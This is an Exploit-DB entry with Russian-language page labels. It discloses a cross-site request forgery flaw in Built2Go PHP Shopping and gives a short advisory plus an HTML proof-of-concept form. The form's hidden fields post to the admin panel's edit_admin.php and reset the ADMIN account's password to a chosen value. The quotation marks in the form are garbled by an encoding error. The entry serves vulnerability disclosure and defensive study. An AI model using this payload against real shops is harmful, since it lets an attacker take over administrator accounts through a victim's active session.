- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39013
- Проверка EDB
-
- Пройдено
- Автор
- ATT4CKXT3RR0R1ST
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2014-01-08
Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)
HTML:
source: https://www.securityfocus.com/bid/64735/info
Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.
<form method=â?POSTâ? name=â?form0? action=â? http://www.example.com/adminpanel/edit_admin.phpâ?>
<input type=â?hiddenâ? name=â?useridâ? value=â?ADMINâ?/>
<input type=â?hiddenâ? name=â?passâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?retypepassâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?addnewâ? value=â?1?/>
<input type=â?hiddenâ? name=â?actionâ? value=â?saveâ?/>
<input type=â?hiddenâ? name=â?newâ? value=â?Submitâ?/>
</form>
- Источник
- www.exploit-db.com